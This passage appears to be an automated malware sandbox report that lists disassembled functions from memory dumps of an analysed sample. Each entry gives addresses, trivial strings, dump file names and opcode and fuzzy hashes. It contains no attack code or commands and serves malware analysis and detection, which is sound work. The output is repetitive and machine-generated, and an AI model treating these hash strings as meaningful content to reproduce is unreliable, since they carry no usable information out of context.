Opcode Fuzzy Hash: dede35f7c21c48175d7ba9e9409b4af0d468d6d8d5c1a19d18b21aa45e236003
Instruction Fuzzy Hash: B091EF71D18A9A8FE78DEB2C88693A9BFE1FB9A314F4001BEC049D3292DF795415C710

Function 00007FF848E80B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FF848E80B46
c9, xrefs: 00007FF848E80B56
!k9, xrefs: 00007FF848E80B4E

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: d93b163c2bdb2472634e4396a3088e109a98ebc91f87f8c2d9b9e3cd3f2fef59
Instruction ID: c256a4a06bbf8f71c47026666226d67a39ffe7ef3821cf483813ddfa802be46c
Opcode Fuzzy Hash: d93b163c2bdb2472634e4396a3088e109a98ebc91f87f8c2d9b9e3cd3f2fef59
Instruction Fuzzy Hash: 2401A72632E95D8FC702AA3DB8504E8BB50EA87135BD903F7D444C7191E211585AC7D1

Function 00007FF848E93959 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848E93976

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e90000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 473b180a637dc59a1fc7702be10faa8a293e757d5cf75751576386a5b60697c5
Instruction ID: 4924357e513430b55298d5509963a58b287c791c5a14b9be0750a581aed1c2d3
Opcode Fuzzy Hash: 473b180a637dc59a1fc7702be10faa8a293e757d5cf75751576386a5b60697c5
Instruction Fuzzy Hash: 23E0D87190E7C48FCB1AFA3888684547FA0EF6724174A51EEC046CF1A7EA2DCC8AC701

Function 00007FF848EBA5A9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848EBA5C6

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 70234b21227b96b9c3125d46742fd869124fd0be33f82aad8cd7608900c45cef
Instruction ID: c4d69c1dd4a11a22b6e605c827084f2af19097f215ade8a94267c3cca10074cc
Opcode Fuzzy Hash: 70234b21227b96b9c3125d46742fd869124fd0be33f82aad8cd7608900c45cef
Instruction Fuzzy Hash: 76F06D71A0E7C44FCB1AEA3488694547FA1EF7720274A52EFC046CF1A3EA2DC889C711

Function 00007FF848EBA639 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848EBA656

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 77768eb1bd8fd95025f7a23abba1b2cc758dd82331647650115c0bc654bc34e5
Instruction ID: 84a17287a1b9a5ab5f2cc364a465f3eebaacf71d7305f80cd00ebadd68335a8d
Opcode Fuzzy Hash: 77768eb1bd8fd95025f7a23abba1b2cc758dd82331647650115c0bc654bc34e5
Instruction Fuzzy Hash: AEE06D71A0E7844FCB1AEA34886D4547FA0EF7720174A42EFC046CB1A7EE2D8889CB01

Function 00007FF848EB6B39 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848EB6B56

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: c71516b4a9d335d0a0315b3d251f255229f38d9ea2e1249b7644bff1107523c9
Instruction ID: c60a9065212338b837d839d54b41bfbdae55685e1c0a3052542f0dfd8cd63bc3
Opcode Fuzzy Hash: c71516b4a9d335d0a0315b3d251f255229f38d9ea2e1249b7644bff1107523c9
Instruction Fuzzy Hash: 3DF06D7190E7C48FC71AEA348869454BFA0EF6720174A42EEC445CF1B7EA2DDC89C741

Function 00007FF848EB19B9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848EB19D6

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 01b715babd1a502bc8e3e767ed0bd85f51d57235999f03529e59aee8b4687dae
Instruction ID: d85eb27738d9756467db4c3346bd877d07301be7c38bf68ed844b4b79ac0f13d
Opcode Fuzzy Hash: 01b715babd1a502bc8e3e767ed0bd85f51d57235999f03529e59aee8b4687dae
Instruction Fuzzy Hash: 9DE06D7190E7C04FCB16EA348868554BFA0EF6721174A51EEC086CF1A7EA2DC889C701

Function 00007FF848EB0699 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848EB06B6

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: e7d27034ece5d7a595cefaf2757af04152df28da39d48006be6153e63cadcc4d
Instruction ID: 74ad969eb737b544615df92e912223e063ed5b6a4b80b032b53e9ee5875bf813
Opcode Fuzzy Hash: e7d27034ece5d7a595cefaf2757af04152df28da39d48006be6153e63cadcc4d
Instruction Fuzzy Hash: 0AE0657150E7C04FC716F634486D4547FA0EF6721174941EEC095CF1A7DA2D9845C741

Function 00007FF848EB1A49 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848EB1A66

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: bb5450781f2ef23f787ac048c14348b4b69519d8d82e3b4e991cd41b05b833d2
Instruction ID: 7fd4a4636b3cd56f32b2e8d824d2ef12da9ebe1ec6220012c223a8535a5a18d8
Opcode Fuzzy Hash: bb5450781f2ef23f787ac048c14348b4b69519d8d82e3b4e991cd41b05b833d2
Instruction Fuzzy Hash: EDE01A7194E7C48FCB0AEB348869A543FA0EE67251B8F41EEC545CF1B3E62D9849C701

Function 00007FF848EBAB79 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848EBAB96

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 2587724f038b1db3851b99c63d9d42954d5dd19eea1ef86e088c4b14b15756c0
Instruction ID: 1f90a0b7bade7197885a2ef2b2628e3430d74c0ece8e7f89c1f357c3e56ae3a1
Opcode Fuzzy Hash: 2587724f038b1db3851b99c63d9d42954d5dd19eea1ef86e088c4b14b15756c0
Instruction Fuzzy Hash: 17E01A7194E7C48FCB0AEB3888698543FA1EEA721178B41EEC045CF1B3E66D8849C701

Function 00007FF848EB8279 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848EB8296

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 1b46997d065b9ff607469783b79d15944c76fa839db98b603d547506b1587ffd
Instruction ID: efd1fd3f5ee534b2b28e30494c6863a08781abb7f5422f6e7e4013d62b662e9c
Opcode Fuzzy Hash: 1b46997d065b9ff607469783b79d15944c76fa839db98b603d547506b1587ffd
Instruction Fuzzy Hash: DAE01A6184E7C04FCB46EB74886A8547FA0EE6725178A40EEC045CF1B3E62D8849C701

Function 00007FF848E90DCD Relevance: .8, Instructions: 753COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e90000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ddd1b42c313212cdff80274b62c00f51da003438d3eb930a075ab961bda4989
Instruction ID: 0409083cb75cbbf248800af1057c656a55e7d8c8bd25bf07f2c18537488c4b29
Opcode Fuzzy Hash: 2ddd1b42c313212cdff80274b62c00f51da003438d3eb930a075ab961bda4989
Instruction Fuzzy Hash: A132B231E1C95A9FEB98FB6884557B873A2FF94384F4441B9D00DC3286DF39AC828785

Function 00007FF848EB30F5 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0d72087c70110ecdbe6680f016e869f421a5b2980fdd4ae904f4d2642e15a1f
Instruction ID: 3512b770ed2dbc838f1840bb3d5b12e037b93cfdccdbc7a805c63bdf24f39c06
Opcode Fuzzy Hash: a0d72087c70110ecdbe6680f016e869f421a5b2980fdd4ae904f4d2642e15a1f
Instruction Fuzzy Hash: FF919021E1CE8A5FEB9CFA2C84562B573D1FFA4791F0841B9D44EC3287DE39A8418785

Function 00007FF848E80998 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7d638c65e291c449ea1d04e237107458ac05df72b02a9fa23b244ff316cf313
Instruction ID: f62300d419dd8f1e0d0c3ea81ed152e9b3df70d1e0398fa486cc73e68d7d5262
Opcode Fuzzy Hash: e7d638c65e291c449ea1d04e237107458ac05df72b02a9fa23b244ff316cf313
Instruction Fuzzy Hash: 3131D120B1DD195FEB98F72C945A67937C2EF99391F9400B9E40DC32D6DE28EC818785

Function 00007FF848E80908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621cce9fa087c7c60936fdf7fdc6eb33fe071945fc0227cffe9b6ad011d8dd25
Instruction ID: fd04b1301abadac1a4e95de5fedeb7223725c2aa5da00a85e95671e619ec96ab
Opcode Fuzzy Hash: 621cce9fa087c7c60936fdf7fdc6eb33fe071945fc0227cffe9b6ad011d8dd25
Instruction Fuzzy Hash: C721EA3170CC184FD768EA5CE889DB973D1FF9932170501BAE58EC7126D921EC8287C5

Function 00007FF848EB2081 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7327067eb1e02e90c4e5ba60bc1572b707e02fcc8c67bc36ed0f86480bdec586
Instruction ID: a1a9ec03f712afeda1aa96a50bb78b7b104482b2ed80c6b62b91073bd2901d6d
Opcode Fuzzy Hash: 7327067eb1e02e90c4e5ba60bc1572b707e02fcc8c67bc36ed0f86480bdec586
Instruction Fuzzy Hash: 4131D431D0C99A8FE759EA18C854BB973A1FBA5350F04427AC40DD72D2CF78AC86CB81

Function 00007FF848E8472C Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b051dc5e207eccf817daa61b1b884514cb809e4d0c09d31bb3c210a061be8a
Instruction ID: 8f4ac2d264eb41a6d96cd946897edf9cefc1b7b79ea420bfa27a554dc85a0275
Opcode Fuzzy Hash: 67b051dc5e207eccf817daa61b1b884514cb809e4d0c09d31bb3c210a061be8a
Instruction Fuzzy Hash: 42311E30E1C50A4EEBA4F75894567BC72E1FF59384F9001B9E80ED3292EF386D814A59

Function 00007FF848EB6ED8 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7cb548a2d56b898572949d43f538d1c19e5db078d7f8b2c72e7ec0605fb8b67
Instruction ID: ccbfcdc3efd48ec38654ec0b972af0fd96f1bb097b4dad798a9f9e245cd7ec77
Opcode Fuzzy Hash: b7cb548a2d56b898572949d43f538d1c19e5db078d7f8b2c72e7ec0605fb8b67
Instruction Fuzzy Hash: 5021B596D8E9527DE60DB67CB8520F93B90EF412B9B0C9177D18C89053DE18548A86AC

Function 00007FF848E811A1 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d66f6a73540430da0a83583fd54a4760b67ba4e3a901599aadba0b7df6fe6507
Instruction ID: 2cf73184dfb7e924252c1eb728dd5556f627e882059cec273651b88fc3402763
Opcode Fuzzy Hash: d66f6a73540430da0a83583fd54a4760b67ba4e3a901599aadba0b7df6fe6507
Instruction Fuzzy Hash: B331503190D68A8FDB45FB68C8589BD7BF0FF56340F4405BAD049D72A2DB39A940C751

Function 00007FF848E94369 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e90000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c075fceb34ca73af03cbf24a957a085bd11677bac30b1bef7d3a54ad6679fed2
Instruction ID: fca33f97ec744dc577f56457b9f077e45bb943390a393e5f4c52e3c436032d51
Opcode Fuzzy Hash: c075fceb34ca73af03cbf24a957a085bd11677bac30b1bef7d3a54ad6679fed2
Instruction Fuzzy Hash: A2210231D0CA894FE712BA7848541BC3BA0FF92358F0902F7C04CC7092EE7859458385

Function 00007FF848E80C25 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 607b3bd3f4c3842ff4dbad027c4740826826a06cf717cbe9352447ae40cc5c7e
Instruction ID: ac66e2f5d3bbf3b00014ca80b270a329f2b54e91f7a2521a88b474563663a5e5
Opcode Fuzzy Hash: 607b3bd3f4c3842ff4dbad027c4740826826a06cf717cbe9352447ae40cc5c7e
Instruction Fuzzy Hash: 7921D131A0D68AAFE712FF28C8552EC7BA0FF42351F5446BAC0449B1D2DB3865898B65

Function 00007FF848E808F8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c1f416020594ee557247f041122de0310064d8515ffc290cd4279cb2b20051
Instruction ID: 334d8a9dcf876bacf2d8a4ebadcdd16a451693534a5875280018f508b84b5e43
Opcode Fuzzy Hash: c8c1f416020594ee557247f041122de0310064d8515ffc290cd4279cb2b20051
Instruction Fuzzy Hash: 1701FC31B0D91D1FD558E01D544A93973C1E7CA6B1B551279D84EC3245DD60EC5342C4

Function 00007FF848E956FD Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e90000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f7d55bc13a94b5d5a3375f5d63c25c9348a8abaf211dbcf02f57f632c59de1
Instruction ID: 69a6a0d90fdd3aa33fdcd9fbccf66576acf4f42e5390d5aaaf61d4f8c982ef3e
Opcode Fuzzy Hash: 40f7d55bc13a94b5d5a3375f5d63c25c9348a8abaf211dbcf02f57f632c59de1
Instruction Fuzzy Hash: 55014921B0DA490FCB0CB63CC8A51B477D0FF96219B4802B6C049C6193ED19D8898785

Function 00007FF848EB6F38 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f299877b34355c47906f3f9fbd44bb6a75f8b0b8c35f6f7ac4dbf9422684429c
Instruction ID: 843e337977000b76121836b0816089fe6f5b2c9de8f7d86fccd16e8ae6f0ca3a
Opcode Fuzzy Hash: f299877b34355c47906f3f9fbd44bb6a75f8b0b8c35f6f7ac4dbf9422684429c
Instruction Fuzzy Hash: DD017096E8D9522DE60CB67CB8520F93740EF512BAF0C8077E04CC9093DD18508986EC

Function 00007FF848EBB840 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 248a5f5628a5213f41edd2178538c6456d817cdc771f6ed3600579243e433e66
Instruction ID: ba2bed6b0a0dd71afc923d011cb61547479ea4098ead3418fdcb470482e8dddd
Opcode Fuzzy Hash: 248a5f5628a5213f41edd2178538c6456d817cdc771f6ed3600579243e433e66
Instruction Fuzzy Hash: 2C01D47694D9515ED20CFA2CE4964E437D0FF51669F084076D04D8A1A3EE16E4868648

Function 00007FF848E94058 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e90000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 485403094a1a0884dc9c49ea877cfa68f6ad1fc43ca36536eee6bfa3498ec374
Instruction ID: ddd44574fb80e77f74fd5ca52bdbe6e78f25c15a10771e21ddb07f75bfb5d565
Opcode Fuzzy Hash: 485403094a1a0884dc9c49ea877cfa68f6ad1fc43ca36536eee6bfa3498ec374
Instruction Fuzzy Hash: 6C11F72184E7C24FD747A7B44865194BFB0AF03258F4E41EBC085CB0E3DAAE188AC722

Function 00007FF848EBD7C3 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d41f66a5ce29c8e88e30197161e94710663eeea7e458867e6c06574817f7f0c2
Instruction ID: c4db1f7937fc1366760e7134bc3090372f58affe574b8c8f38aa5a93e4f02c2b
Opcode Fuzzy Hash: d41f66a5ce29c8e88e30197161e94710663eeea7e458867e6c06574817f7f0c2
Instruction Fuzzy Hash: CD015E32F0C4198FEB55E658A8852FC73E2FBA8761F580172D40C97185DB39D9468794

Function 00007FF848E82398 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 563abf7406fcaf4123f91a224093c9d38ebb34fd35908c87f18c0962aac8aeb3
Instruction ID: dc5261cc3a19e72a476f1c049d04cf95e216bd5abdf0ae9decd5f4fd76e89e95
Opcode Fuzzy Hash: 563abf7406fcaf4123f91a224093c9d38ebb34fd35908c87f18c0962aac8aeb3
Instruction Fuzzy Hash: 1F11BA3194891ACFDB68EB08C894BA973E1FB68311F4501BAC40EE7691DB35AD84DB85

Function 00007FF848E80C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06657ddc82e0ca7df27ccf203e8116bf855cb9e4d99a1a760914a731cc4cd6a3
Instruction ID: 0f17ad81876027be1e05397701be0e1341c9269cde924c534ff86359a5077043
Opcode Fuzzy Hash: 06657ddc82e0ca7df27ccf203e8116bf855cb9e4d99a1a760914a731cc4cd6a3
Instruction Fuzzy Hash: 91018C31A0D6899FE702FF28C8542EDBFB0FF42350F5546F6C044DB292DA3856498B94

Function 00007FF848E8476B Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 564811df3341a67cedba09dbffc5440e4de5f582db33a59a0930a5cecb0b3b55
Instruction ID: 32b5a810bf3f97fff13e304244cb5d3a75901c803fa727eea6f3e78ce640af1a
Opcode Fuzzy Hash: 564811df3341a67cedba09dbffc5440e4de5f582db33a59a0930a5cecb0b3b55
Instruction Fuzzy Hash: BC01193094C41E8EEB64FA44D851BFCB2A1FF54355F9040BAD81EE3692EF3869858A19

Function 00007FF848EBAAE9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848eb0000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecd928eb4cf7597567761c26b8acb61bb89a260d5d4a25ece45f3cf9096060ed
Instruction ID: c4287e20eb3040205f890e4c2c8a18f48308ca4dc773e7be7f6fb163480af938
Opcode Fuzzy Hash: ecd928eb4cf7597567761c26b8acb61bb89a260d5d4a25ece45f3cf9096060ed
Instruction Fuzzy Hash: 4DF0A731B0DBC44FC759963958650617FE1DB6751134902EFC086C76A3E955AC858741

Function 00007FF848E80C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4ed13d17b6252f450d76000f4c36e4bc4073b3afbd41709bca5dec13c30c21
Instruction ID: edc84c5b304451007c8b2db385acfd6ca3f07bbe7973d11e68f4cf7e7131a33d
Opcode Fuzzy Hash: fd4ed13d17b6252f450d76000f4c36e4bc4073b3afbd41709bca5dec13c30c21
Instruction Fuzzy Hash: F9014B7090D7899FE712EB64888429DBFB0FF02314F5441E6D444DB292DA385A488755

Function 00007FF848E847F2 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e802f2d097568cec3fa52b364d907dd46164ece8d02af576cb16dd2647e00adc
Instruction ID: de0d34041823c649959d1ecd591095ae739b5b561b67c17f97cbbbcabacdf63b
Opcode Fuzzy Hash: e802f2d097568cec3fa52b364d907dd46164ece8d02af576cb16dd2647e00adc
Instruction Fuzzy Hash: ADF05E30A0C40A8EEA64FB04D8557BCB3A1FF55394F9041B5DC4ED36A2FF386D914699

Function 00007FF848E80B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ff848e80000_dEhCbXEAIUCUplvbdoWVtmGx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad9175faafda6f5a4a32d69be044f39bccd11f16f512f9d3f1bb86e5a37a3e2e
Instruction ID: fda668f121696ffe34677b8b11cd5eeb5631841b73dca4be8b315c0d356f5f72
Opcode Fuzzy Hash: ad9175faafda6f5a4a32d69be044f39bccd11f16f512f9d3f1bb86e5a37a3e2e
Instruction Fuzzy Hash: DEF0823525D589CFD742EA3C88958D4BF60EB03104B9A02E9D089C75A2D315585AC741

Function 00007FF848EB2C29 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2445532452.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false

Joe Sandbox IDA Plugin

